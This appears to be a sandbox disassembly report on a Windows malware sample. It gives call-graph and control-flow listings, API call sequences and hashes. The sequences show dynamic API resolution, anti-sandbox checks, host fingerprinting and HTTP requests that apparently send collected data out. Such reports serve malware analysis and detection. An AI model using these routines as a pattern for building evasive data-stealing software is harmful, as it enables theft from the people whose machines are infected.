API calls 26289->26290 26291 7d3fd4 26290->26291 26292 7d4a60 2 API calls 26291->26292 26293 7d3fea 26292->26293 26294 7d4a60 2 API calls 26293->26294 26295 7d4003 26294->26295 26296 7d4a60 2 API calls 26295->26296 26297 7d4019 26296->26297 26298 7d4a60 2 API calls 26297->26298 26299 7d402f 26298->26299 26300 7d4a60 2 API calls 26299->26300 26301 7d4045 26300->26301 26302 7d4a60 2 API calls 26301->26302 26303 7d405b 26302->26303 26304 7d4a60 2 API calls 26303->26304 26305 7d4071 26304->26305 26306 7d4a60 2 API calls 26305->26306 26307 7d408a 26306->26307 26308 7d4a60 2 API calls 26307->26308 26309 7d40a0 26308->26309 26310 7d4a60 2 API calls 26309->26310 26311 7d40b6 26310->26311 26312 7d4a60 2 API calls 26311->26312 26313 7d40cc 26312->26313 26314 7d4a60 2 API calls 26313->26314 26315 7d40e2 26314->26315 26316 7d4a60 2 API calls 26315->26316 26317 7d40f8 26316->26317 26318 7d4a60 2 API calls 26317->26318 26319 7d4111 26318->26319 26320 7d4a60 2 API calls 26319->26320 26321 7d4127 26320->26321 26322 7d4a60 2 API calls 26321->26322 26323 7d413d 26322->26323 26324 7d4a60 2 API calls 26323->26324 26325 7d4153 26324->26325 26326 7d4a60 2 API calls 26325->26326 26327 7d4169 26326->26327 26328 7d4a60 2 API calls 26327->26328 26329 7d417f 26328->26329 26330 7d4a60 2 API calls 26329->26330 26331 7d4198 26330->26331 26332 7d4a60 2 API calls 26331->26332 26333 7d41ae 26332->26333 26334 7d4a60 2 API calls 26333->26334 26335 7d41c4 26334->26335 26336 7d4a60 2 API calls 26335->26336 26337 7d41da 26336->26337 26338 7d4a60 2 API calls 26337->26338 26339 7d41f0 26338->26339 26340 7d4a60 2 API calls 26339->26340 26341 7d4206 26340->26341 26342 7d4a60 2 API calls 26341->26342 26343 7d421f 26342->26343 26344 7d4a60 2 API calls 26343->26344 26345 7d4235 26344->26345 26346 7d4a60 2 API calls 26345->26346 26347 7d424b 26346->26347 26348 7d4a60 2 API calls 26347->26348 26349 7d4261 26348->26349 26350 7d4a60 2 API calls 26349->26350 26351 7d4277 26350->26351 26352 7d4a60 2 API calls 26351->26352 26353 7d428d 26352->26353 26354 7d4a60 2 API calls 26353->26354 26355 7d42a6 26354->26355 26356 7d4a60 2 API calls 26355->26356 26357 7d42bc 26356->26357 26358 7d4a60 2 API calls 26357->26358 26359 7d42d2 26358->26359 26360 7d4a60 2 API calls 26359->26360 26361 7d42e8 26360->26361 26362 7d4a60 2 API calls 26361->26362 26363 7d42fe 26362->26363 26364 7d4a60 2 API calls 26363->26364 26365 7d4314 26364->26365 26366 7d4a60 2 API calls 26365->26366 26367 7d432d 26366->26367 26368 7d4a60 2 API calls 26367->26368 26369 7d4343 26368->26369 26370 7d4a60 2 API calls 26369->26370 26371 7d4359 26370->26371 26372 7d4a60 2 API calls 26371->26372 26373 7d436f 26372->26373 26374 7d4a60 2 API calls 26373->26374 26375 7d4385 26374->26375 26376 7d4a60 2 API calls 26375->26376 26377 7d439b 26376->26377 26378 7d4a60 2 API calls 26377->26378 26379 7d43b4 26378->26379 26380 7d4a60 2 API calls 26379->26380 26381 7d43ca 26380->26381 26382 7d4a60 2 API calls 26381->26382 26383 7d43e0 26382->26383 26384 7d4a60 2 API calls 26383->26384 26385 7d43f6 26384->26385 26386 7d4a60 2 API calls 26385->26386 26387 7d440c 26386->26387 26388 7d4a60 2 API calls 26387->26388 26389 7d4422 26388->26389 26390 7d4a60 2 API calls 26389->26390 26391 7d443b 26390->26391 26392 7d4a60 2 API calls 26391->26392 26393 7d4451 26392->26393 26394 7d4a60 2 API calls 26393->26394 26395 7d4467 26394->26395 26396 7d4a60 2 API calls 26395->26396 26397 7d447d 26396->26397 26398 7d4a60 2 API calls 26397->26398 26399 7d4493 26398->26399 26400 7d4a60 2 API calls 26399->26400 26401 7d44a9 26400->26401 26402 7d4a60 2 API calls 26401->26402 26403 7d44c2 26402->26403 26404 7d4a60 2 API calls 26403->26404 26405 7d44d8 26404->26405 26406 7d4a60 2 API calls 26405->26406 26407 7d44ee 26406->26407 26408 7d4a60 2 API calls 26407->26408 26409 7d4504 26408->26409 26410 7d4a60 2 API calls 26409->26410 26411 7d451a 26410->26411 26412 7d4a60 2 API calls 26411->26412 26413 7d4530 26412->26413 26414 7d4a60 2 API calls 26413->26414 26415 7d4549 26414->26415 26416 7d4a60 2 API calls 26415->26416 26417 7d455f 26416->26417 26418 7d4a60 2 API calls 26417->26418 26419 7d4575 26418->26419 26420 7d4a60 2 API calls 26419->26420 26421 7d458b 26420->26421 26422 7d4a60 2 API calls 26421->26422 26423 7d45a1 26422->26423 26424 7d4a60 2 API calls 26423->26424 26425 7d45b7 26424->26425 26426 7d4a60 2 API calls 26425->26426 26427 7d45d0 26426->26427 26428 7d4a60 2 API calls 26427->26428 26429 7d45e6 26428->26429 26430 7d4a60 2 API calls 26429->26430 26431 7d45fc 26430->26431 26432 7d4a60 2 API calls 26431->26432 26433 7d4612 26432->26433 26434 7d4a60 2 API calls 26433->26434 26435 7d4628 26434->26435 26436 7d4a60 2 API calls 26435->26436 26437 7d463e 26436->26437 26438 7d4a60 2 API calls 26437->26438 26439 7d4657 26438->26439 26440 7d4a60 2 API calls 26439->26440 26441 7d466d 26440->26441 26442 7d4a60 2 API calls 26441->26442 26443 7d4683 26442->26443 26444 7d4a60 2 API calls 26443->26444 26445 7d4699 26444->26445 26446 7d4a60 2 API calls 26445->26446 26447 7d46af 26446->26447 26448 7d4a60 2 API calls 26447->26448 26449 7d46c5 26448->26449 26450 7d4a60 2 API calls 26449->26450 26451 7d46de 26450->26451 26452 7d4a60 2 API calls 26451->26452 26453 7d46f4 26452->26453 26454 7d4a60 2 API calls 26453->26454 26455 7d470a 26454->26455 26456 7d4a60 2 API calls 26455->26456 26457 7d4720 26456->26457 26458 7d4a60 2 API calls 26457->26458 26459 7d4736 26458->26459 26460 7d4a60 2 API calls 26459->26460 26461 7d474c 26460->26461 26462 7d4a60 2 API calls 26461->26462 26463 7d4765 26462->26463 26464 7d4a60 2 API calls 26463->26464 26465 7d477b 26464->26465 26466 7d4a60 2 API calls 26465->26466 26467 7d4791 26466->26467 26468 7d4a60 2 API calls 26467->26468 26469 7d47a7 26468->26469 26470 7d4a60 2 API calls 26469->26470 26471 7d47bd 26470->26471 26472 7d4a60 2 API calls 26471->26472 26473 7d47d3 26472->26473 26474 7d4a60 2 API calls 26473->26474 26475 7d47ec 26474->26475 26476 7d4a60 2 API calls 26475->26476 26477 7d4802 26476->26477 26478 7d4a60 2 API calls 26477->26478 26479 7d4818 26478->26479 26480 7d4a60 2 API calls 26479->26480 26481 7d482e 26480->26481 26482 7d4a60 2 API calls 26481->26482 26483 7d4844 26482->26483 26484 7d4a60 2 API calls 26483->26484 26485 7d485a 26484->26485 26486 7d4a60 2 API calls 26485->26486 26487 7d4873 26486->26487 26488 7d4a60 2 API calls 26487->26488 26489 7d4889 26488->26489 26490 7d4a60 2 API calls 26489->26490 26491 7d489f 26490->26491 26492 7d4a60 2 API calls 26491->26492 26493 7d48b5 26492->26493 26494 7d4a60 2 API calls 26493->26494 26495 7d48cb 26494->26495 26496 7d4a60 2 API calls 26495->26496 26497 7d48e1 26496->26497 26498 7d4a60 2 API calls 26497->26498 26499 7d48fa 26498->26499 26500 7d4a60 2 API calls 26499->26500 26501 7d4910 26500->26501 26502 7d4a60 2 API calls 26501->26502 26503 7d4926 26502->26503 26504 7d4a60 2 API calls 26503->26504 26505 7d493c 26504->26505 26506 7d4a60 2 API calls 26505->26506 26507 7d4952 26506->26507 26508 7d4a60 2 API calls 26507->26508 26509 7d4968 26508->26509 26510 7d4a60 2 API calls 26509->26510 26511 7d4981 26510->26511 26512 7d4a60 2 API calls 26511->26512 26513 7d4997 26512->26513 26514 7d4a60 2 API calls 26513->26514 26515 7d49ad 26514->26515 26516 7d4a60 2 API calls 26515->26516 26517 7d49c3 26516->26517 26518 7d4a60 2 API calls 26517->26518 26519 7d49d9 26518->26519 26520 7d4a60 2 API calls 26519->26520 26521 7d49ef 26520->26521 26522 7d4a60 2 API calls 26521->26522 26523 7d4a08 26522->26523 26524 7d4a60 2 API calls 26523->26524 26525 7d4a1e 26524->26525 26526 7d4a60 2 API calls 26525->26526 26527 7d4a34 26526->26527 26528 7d4a60 2 API calls 26527->26528 26529 7d4a4a 26528->26529 26530 7f66e0 26529->26530 26531 7f6afe 8 API calls 26530->26531 26532 7f66ed 43 API calls 26530->26532 26533 7f6c08 26531->26533 26534 7f6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26531->26534 26532->26531 26535 7f6c15 8 API calls 26533->26535 26536 7f6cd2 26533->26536 26534->26533 26535->26536 26537 7f6d4f 26536->26537 26538 7f6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26536->26538 26539 7f6d5c 6 API calls 26537->26539 26540 7f6de9 26537->26540 26538->26537 26539->26540 26541 7f6df6 12 API calls 26540->26541 26542 7f6f10 26540->26542 26541->26542 26543 7f6f8d 26542->26543 26544 7f6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26542->26544 26545 7f6f96 GetProcAddress GetProcAddress 26543->26545 26546 7f6fc1 26543->26546 26544->26543 26545->26546 26547 7f6fca GetProcAddress GetProcAddress 26546->26547 26548 7f6ff5 26546->26548 26547->26548 26549 7f70ed 26548->26549 26550 7f7002 10 API calls 26548->26550 26551 7f70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26549->26551 26552 7f7152 26549->26552 26550->26549 26551->26552 26553 7f716e 26552->26553 26554 7f715b GetProcAddress 26552->26554 26555 7f7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26553->26555 26556 7f051f 26553->26556 26554->26553 26555->26556 26557 7d1530 26556->26557 26866 7d1610 26557->26866 26559 7d153b 26560 7d1555 lstrcpy 26559->26560 26561 7d155d 26559->26561 26560->26561 26562 7d1577 lstrcpy 26561->26562 26563 7d157f 26561->26563 26562->26563 26564 7d1599 lstrcpy 26563->26564 26566 7d15a1 26563->26566 26564->26566 26565 7d1605 26568 7ef1b0 lstrlen 26565->26568 26566->26565 26567 7d15fd lstrcpy 26566->26567 26567->26565 26569 7ef1e4 26568->26569 26570 7ef1eb lstrcpy 26569->26570 26571 7ef1f7 lstrlen 26569->26571 26570->26571 26572 7ef208 26571->26572 26573 7ef20f lstrcpy 26572->26573 26574 7ef21b lstrlen 26572->26574 26573->26574 26575 7ef22c 26574->26575 26576 7ef233 lstrcpy 26575->26576 26577 7ef23f 26575->26577 26576->26577 26578 7ef258 lstrcpy 26577->26578 26579 7ef264 26577->26579 26578->26579 26580 7ef286 lstrcpy 26579->26580 26581 7ef292 26579->26581 26580->26581 26582 7ef2ba lstrcpy 26581->26582 26583 7ef2c6 26581->26583 26582->26583 26584 7ef2ea lstrcpy 26583->26584 26635 7ef300 26583->26635 26584->26635 26585 7ef30c lstrlen 26585->26635 26586 7ef4b9 lstrcpy 26586->26635 26587 7ef3a1 lstrcpy 26587->26635 26588 7ef4e8 lstrcpy 26651 7ef4f0 26588->26651 26589 7ef3c5 lstrcpy 26589->26635 26590 7d1530 8 API calls 26590->26651 26591 7eee90 28 API calls 26591->26635 26592 7ef479 lstrcpy 26592->26635 26593 7ef59c lstrcpy 26593->26651 26594 7ef70f StrCmpCA 26599 7efe8e 26594->26599 26594->26635 26595 7ef616 StrCmpCA 26595->26594 26595->26651 26596 7efa29 StrCmpCA 26605 7efe2b 26596->26605 26596->26635 26597 7ef73e lstrlen 26597->26635 26598 7efead lstrlen 26611 7efec7 26598->26611 26599->26598 26601 7efea5 lstrcpy 26599->26601 26600 7efd4d StrCmpCA 26603 7efd60 Sleep 26600->26603 26613 7efd75 26600->26613 26601->26598 26602 7efa58 lstrlen 26602->26635 26603->26635 26604 7ef64a lstrcpy 26604->26651 26606 7efe4a lstrlen 26605->26606 26608 7efe42 lstrcpy 26605->26608 26619 7efe64 26606->26619 26607 7ef89e lstrcpy 26607->26635 26608->26606 26609 7eee90 28 API calls 26609->26651 26610 7ef76f lstrcpy 26610->26635 26612 7efee7 lstrlen 26611->26612 26617 7efedf lstrcpy 26611->26617 26627 7eff01 26612->26627 26614 7efd94 lstrlen 26613->26614 26615 7efd8c lstrcpy 26613->26615 26621 7efdae 26614->26621 26615->26614 26616 7efbb8 lstrcpy 26616->26635 26617->26612 26618 7efa89 lstrcpy 26618->26635 26620 7efdce lstrlen 26619->26620 26622 7efe7c lstrcpy 26619->26622 26636 7efde8 26620->26636 26621->26620 26631 7efdc6 lstrcpy 26621->26631 26622->26620 26623 7ef791 lstrcpy 26623->26635 26625 7d1530 8 API calls 26625->26635 26626 7ef8cd lstrcpy 26626->26651 26628 7eff21 26627->26628 26633 7eff19 lstrcpy 26627->26633 26634 7d1610 4 API calls 26628->26634 26629 7efaab lstrcpy 26629->26635 26630 7ef698 lstrcpy 26630->26651 26631->26620 26632 7efbe7 lstrcpy 26632->26651 26633->26628 26643 7efe13 26634->26643 26635->26585 26635->26586 26635->26587 26635->26588 26635->26589 26635->26591 26635->26592 26635->26594 26635->26596 26635->26597 26635->26600 26635->26602 26635->26607 26635->26610 26635->26616 26635->26618 26635->26623 26635->26625 26635->26626 26635->26629 26635->26632 26641 7ef7e2 lstrcpy 26635->26641 26645 7efafc lstrcpy 26635->26645 26635->26651 26637 7efe08 26636->26637 26639 7efe00 lstrcpy 26636->26639 26640 7d1610 4 API calls 26637->26640 26638 7eefb0 35 API calls 26638->26651 26639->26637 26640->26643 26641->26635 26642 7ef924 lstrcpy 26642->26651 26643->25676 26644 7ef99e StrCmpCA 26644->26596 26644->26651 26645->26635 26646 7efc3e lstrcpy 26646->26651 26647 7efcb8 StrCmpCA 26647->26600 26647->26651 26648 7ef9cb lstrcpy 26648->26651 26649 7efce9 lstrcpy 26649->26651 26650 7efa19 lstrcpy 26650->26651 26651->26590 26651->26593 26651->26595 26651->26596 26651->26600 26651->26604 26651->26609 26651->26630 26651->26635 26651->26638 26651->26642 26651->26644 26651->26646 26651->26647 26651->26648 26651->26649 26651->26650 26652 7efd3a lstrcpy 26651->26652 26652->26651 26654 7f278c GetVolumeInformationA 26653->26654 26655 7f2785 26653->26655 26656 7f27ec GetProcessHeap RtlAllocateHeap 26654->26656 26655->26654 26658 7f2826 wsprintfA 26656->26658 26659 7f2822 26656->26659 26658->26659 26876 7f71e0 26659->26876 26663 7d4c70 26662->26663 26664 7d4c85 26663->26664 26665 7d4c7d lstrcpy 26663->26665 26880 7d4bc0 26664->26880 26665->26664 26667 7d4c90 26668 7d4ccc lstrcpy 26667->26668 26669 7d4cd8 26667->26669 26668->26669 26670 7d4cff lstrcpy 26669->26670 26671 7d4d0b 26669->26671 26670->26671 26672 7d4d2f lstrcpy 26671->26672 26673 7d4d3b 26671->26673 26672->26673 26674 7d4d6d lstrcpy 26673->26674 26675 7d4d79 26673->26675 26674->26675 26676 7d4dac InternetOpenA StrCmpCA 26675->26676 26677 7d4da0 lstrcpy 26675->26677 26678 7d4de0 26676->26678 26677->26676 26679 7d54b8 InternetCloseHandle CryptStringToBinaryA 26678->26679 26884 7f3e70 26678->26884 26680 7d54e8 LocalAlloc 26679->26680 26697 7d55d8 26679->26697 26682 7d54ff CryptStringToBinaryA 26680->26682 26680->26697 26683 7d5529 lstrlen 26682->26683 26684 7d5517 LocalFree 26682->26684 26685 7d553d 26683->26685 26684->26697 26687 7d5557 lstrcpy 26685->26687 26688 7d5563 lstrlen 26685->26688 26686 7d4dfa 26689 7d4e23 lstrcpy lstrcat 26686->26689 26690 7d4e38 26686->26690 26687->26688 26692 7d557d 26688->26692 26689->26690 26691 7d4e5a lstrcpy 26690->26691 26694 7d4e62 26690->26694 26691->26694 26693 7d558f lstrcpy lstrcat 26692->26693 26695 7d55a2 26692->26695 26693->26695 26696 7d4e71 lstrlen 26694->26696 26698 7d55d1 26695->26698 26700 7d55c9 lstrcpy 26695->26700 26699 7d4e89 26696->26699 26697->25705 26698->26697 26701 7d4e95 lstrcpy lstrcat 26699->26701 26702 7d4eac 26699->26702 26700->26698 26701->26702 26703 7d4ed5 26702->26703 26704 7d4ecd lstrcpy 26702->26704 26705 7d4edc lstrlen 26703->26705 26704->26703 26706 7d4ef2 26705->26706 26707 7d4efe lstrcpy lstrcat 26706->26707 26708 7d4f15 26706->26708 26707->26708 26709 7d4f36 lstrcpy 26708->26709 26710 7d4f3e 26708->26710 26709->26710 26711 7d4f65 lstrcpy lstrcat 26710->26711 26712 7d4f7b 26710->26712 26711->26712 26713 7d4fa4 26712->26713 26714 7d4f9c lstrcpy 26712->26714 26715 7d4fab lstrlen 26713->26715 26714->26713 26716 7d4fc1 26715->26716 26717 7d4fcd lstrcpy lstrcat 26716->26717 26718 7d4fe4 26716->26718 26717->26718 26719 7d500d 26718->26719 26720 7d5005 lstrcpy 26718->26720 26721 7d5014 lstrlen 26719->26721 26720->26719 26722 7d502a 26721->26722 26723 7d5036 lstrcpy lstrcat 26722->26723 26724 7d504d 26722->26724 26723->26724 26725 7d5079 26724->26725 26726 7d5071 lstrcpy 26724->26726 26727 7d5080 lstrlen 26725->26727 26726->26725 26728 7d509b 26727->26728 26729 7d50ac lstrcpy lstrcat 26728->26729 26730 7d50bc 26728->26730 26729->26730 26731 7d50da lstrcpy lstrcat 26730->26731 26732 7d50ed 26730->26732 26731->26732 26733 7d510b lstrcpy 26732->26733 26734 7d5113 26732->26734 26733->26734 26735 7d5121 InternetConnectA 26734->26735 26735->26679 26736 7d5150 HttpOpenRequestA 26735->26736 26737 7d518b 26736->26737 26738 7d54b1 InternetCloseHandle 26736->26738 26891 7f7310 lstrlen 26737->26891 26738->26679 26742 7d51a4 26899 7f72c0 26742->26899 26745 7f7280 lstrcpy 26746 7d51c0 26745->26746 26747 7f7310 3 API calls 26746->26747 26748 7d51d5 26747->26748 26749 7f7280 lstrcpy 26748->26749 26750 7d51de 26749->26750 26751 7f7310 3 API calls 26750->26751 26752 7d51f4 26751->26752 26753 7f7280 lstrcpy 26752->26753 26754 7d51fd 26753->26754 26755 7f7310 3 API calls 26754->26755 26756 7d5213 26755->26756 26757 7f7280 lstrcpy 26756->26757 26758 7d521c 26757->26758 26759 7f7310 3 API calls 26758->26759 26760 7d5231 26759->26760 26761 7f7280 lstrcpy 26760->26761 26762 7d523a 26761->26762 26763 7f72c0 2 API calls 26762->26763 26764 7d524d 26763->26764 26765 7f7280 lstrcpy 26764->26765 26766 7d5256 26765->26766 26767 7f7310 3 API calls 26766->26767 26768 7d526b 26767->26768 26769 7f7280 lstrcpy 26768->26769 26770 7d5274 26769->26770 26771 7f7310 3 API calls 26770->26771 26772 7d5289 26771->26772 26773 7f7280 lstrcpy 26772->26773 26774 7d5292 26773->26774 26775 7f72c0 2 API calls 26774->26775 26776 7d52a5 26775->26776 26777 7f7280 lstrcpy 26776->26777 26778 7d52ae 26777->26778 26779 7f7310 3 API calls 26778->26779 26780 7d52c3 26779->26780 26781 7f7280 lstrcpy 26780->26781 26782 7d52cc 26781->26782 26783 7f7310 3 API calls 26782->26783 26784 7d52e2 26783->26784 26785 7f7280 lstrcpy 26784->26785 26786 7d52eb 26785->26786 26787 7f7310 3 API calls 26786->26787 26788 7d5301 26787->26788 26789 7f7280 lstrcpy 26788->26789 26790 7d530a 26789->26790 26791 7f7310 3 API calls 26790->26791 26792 7d531f 26791->26792 26793 7f7280 lstrcpy 26792->26793 26794 7d5328 26793->26794 26795 7f72c0 2 API calls 26794->26795 26796 7d533b 26795->26796 26797 7f7280 lstrcpy 26796->26797 26798 7d5344 26797->26798 26799 7d537c 26798->26799 26800 7d5370 lstrcpy 26798->26800 26801 7f72c0 2 API calls 26799->26801 26800->26799 26802 7d538a 26801->26802 26803 7f72c0 2 API calls 26802->26803 26804 7d5397 26803->26804 26805 7f7280 lstrcpy 26804->26805 26806 7d53a1 26805->26806 26807 7d53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26806->26807 26808 7d549c InternetCloseHandle 26807->26808 26812 7d53f2 26807->26812 26810 7d54ae 26808->26810 26809 7d53fd lstrlen 26809->26812 26810->26738 26811 7d542e lstrcpy lstrcat 26811->26812 26812->26808 26812->26809 26812->26811 26813 7d5473 26812->26813 26814 7d546b lstrcpy 26812->26814 26815 7d547a InternetReadFile 26813->26815 26814->26813 26815->26808 26815->26812 26817 7e8cc6 ExitProcess 26816->26817 26832 7e8ccd 26816->26832 26818 7e8ee2 26818->25707 26819 7e8dbd StrCmpCA 26819->26832 26820 7e8ddd StrCmpCA 26820->26832 26821 7e8dfd StrCmpCA 26821->26832 26822 7e8e1d StrCmpCA 26822->26832 26823 7e8e3d StrCmpCA 26823->26832 26824 7e8d5a lstrlen 26824->26832 26825 7e8e56 StrCmpCA 26825->26832 26826 7e8d30 lstrlen 26826->26832 26827 7e8e6f StrCmpCA 26827->26832 26828 7e8e88 lstrlen 26828->26832 26829 7e8d06 lstrlen 26829->26832 26830 7e8d84 StrCmpCA 26830->26832 26831 7e8da4 StrCmpCA 26831->26832 26832->26818 26832->26819 26832->26820 26832->26821 26832->26822 26832->26823 26832->26824 26832->26825 26832->26826 26832->26827 26832->26828 26832->26829 26832->26830 26832->26831 26833 7e8ebb lstrcpy 26832->26833 26833->26832 26834->25713 26835->25715 26836->25721 26837->25723 26838->25729 26839->25731 26840->25737 26841->25741 26842->25747 26843->25749 26844->25753 26845->25767 26846->25771 26847->25770 26848->25766 26849->25770 26850->25786 26851->25773 26852->25775 26853->25780 26854->25783 26855->25788 26856->25790 26857->25797 26858->25803 26859->25824 26860->25828 26861->25826 26862->25823 26863->25826 26864->25837 26867 7d161f 26866->26867 26868 7d162b lstrcpy 26867->26868 26869 7d1633 26867->26869 26868->26869 26870 7d164d lstrcpy 26869->26870 26871 7d1655 26869->26871 26870->26871 26872 7d166f lstrcpy 26871->26872 26873 7d1677 26871->26873 26872->26873 26874 7d1699 26873->26874 26875 7d1691 lstrcpy 26873->26875 26874->26559 26875->26874 26877 7f71e6 26876->26877 26878 7f71fc lstrcpy 26877->26878 26879 7f2860 26877->26879 26878->26879 26879->25702 26881 7d4bd0 26880->26881 26881->26881 26882 7d4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26881->26882 26883 7d4c41 26882->26883 26883->26667 26885 7f3e83 26884->26885 26886 7f3e9f lstrcpy 26885->26886 26887 7f3eab 26885->26887 26886->26887 26888 7f3ecd lstrcpy 26887->26888 26889 7f3ed5 GetSystemTime 26887->26889 26888->26889 26890 7f3ef3 26889->26890 26890->26686 26893 7f732d 26891->26893 26892 7d519b 26895 7f7280 26892->26895 26893->26892 26894 7f733d lstrcpy lstrcat 26893->26894 26894->26892 26896 7f728c 26895->26896 26897 7f72b4 26896->26897 26898 7f72ac lstrcpy 26896->26898 26897->26742 26898->26897 26901 7f72dc 26899->26901 26900 7d51b7 26900->26745 26901->26900 26902 7f72ed lstrcpy lstrcat 26901->26902 26902->26900 26933 7f31f0 GetSystemInfo wsprintfA 26908 7d5869 57 API calls 26936 7e1269 408 API calls 26927 7f2d60 11 API calls 26948 7f2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26949 7fa280 __CxxFrameHandler 26928 7e3959 244 API calls 26934 7e01d9 126 API calls 26909 7f2853 lstrcpy 26917 7f2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26961 7e8615 48 API calls 26910 7ee049 147 API calls 26950 7e8615 49 API calls 26918 7f3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26962 7f33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 26937 7df639 144 API calls 26942 7d16b9 200 API calls 26951 7dbf39 177 API calls 26963 7eabb2 120 API calls 26931 7f3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 26955 7e4b29 303 API calls 26964 7e23a9 298 API calls 26939 7d8e20 strlen free std::exception::exception 26919 7f30a0 GetSystemPowerStatus 26935 7f29a0 GetCurrentProcess IsWow64Process 26921 7f749e 6 API calls ctype 26965 7ddb99 672 API calls 26966 7e8615 47 API calls 26912 7f8819 free free strlen free _raise 26922 7e2499 290 API calls 26932 7f4e35 8 API calls 26914 7d1011 GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 26915 7f2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 26967 7f938d 126 API calls 3 library calls 26957 7db309 98 API calls 26923 7e8c88 16 API calls 26924 7f2880 10 API calls 26925 7f4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26926 7f3480 6 API calls 26943 7f3280 7 API calls 26958 7d7702 free ctype
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D4C7F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4CD2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D05
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D35
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D73
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007D4DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 90b226eaeba6317080428c9cb8f411aa684e4f315dfa74eb8a3af8b2f49b364a
                          • Instruction ID: d612436737f27ce2ef672abbcecfcfeedbc64fb41753a54790e0c17a2b986569
                          • Opcode Fuzzy Hash: 90b226eaeba6317080428c9cb8f411aa684e4f315dfa74eb8a3af8b2f49b364a
                          • Instruction Fuzzy Hash: 94525C71A1161ADBDB21EFA4DC49BAE77B9AF44310F144026F905E7352DB38AC43CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 7f6390-7f63bd GetPEB 2126 7f65c3-7f6623 LoadLibraryA * 5 2125->2126 2127 7f63c3-7f65be call 7f62f0 GetProcAddress * 20 2125->2127 2128 7f6638-7f663f 2126->2128 2129 7f6625-7f6633 GetProcAddress 2126->2129 2127->2126 2131 7f666c-7f6673 2128->2131 2132 7f6641-7f6667 GetProcAddress * 2 2128->2132 2129->2128 2134 7f6688-7f668f 2131->2134 2135 7f6675-7f6683 GetProcAddress 2131->2135 2132->2131 2137 7f66a4-7f66ab 2134->2137 2138 7f6691-7f669f GetProcAddress 2134->2138 2135->2134 2139 7f66ad-7f66d2 GetProcAddress * 2 2137->2139 2140 7f66d7-7f66da 2137->2140 2138->2137 2139->2140
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01252218), ref: 007F63E9
                          • GetProcAddress.KERNEL32(74DD0000,01252320), ref: 007F6402
                          • GetProcAddress.KERNEL32(74DD0000,01252380), ref: 007F641A
                          • GetProcAddress.KERNEL32(74DD0000,01252338), ref: 007F6432
                          • GetProcAddress.KERNEL32(74DD0000,01258F08), ref: 007F644B
                          • GetProcAddress.KERNEL32(74DD0000,01245970), ref: 007F6463
                          • GetProcAddress.KERNEL32(74DD0000,01245710), ref: 007F647B
                          • GetProcAddress.KERNEL32(74DD0000,01252488), ref: 007F6494
                          • GetProcAddress.KERNEL32(74DD0000,01252398), ref: 007F64AC
                          • GetProcAddress.KERNEL32(74DD0000,012523F8), ref: 007F64C4
                          • GetProcAddress.KERNEL32(74DD0000,012523B0), ref: 007F64DD
                          • GetProcAddress.KERNEL32(74DD0000,01245990), ref: 007F64F5
                          • GetProcAddress.KERNEL32(74DD0000,012523C8), ref: 007F650D
                          • GetProcAddress.KERNEL32(74DD0000,01252428), ref: 007F6526
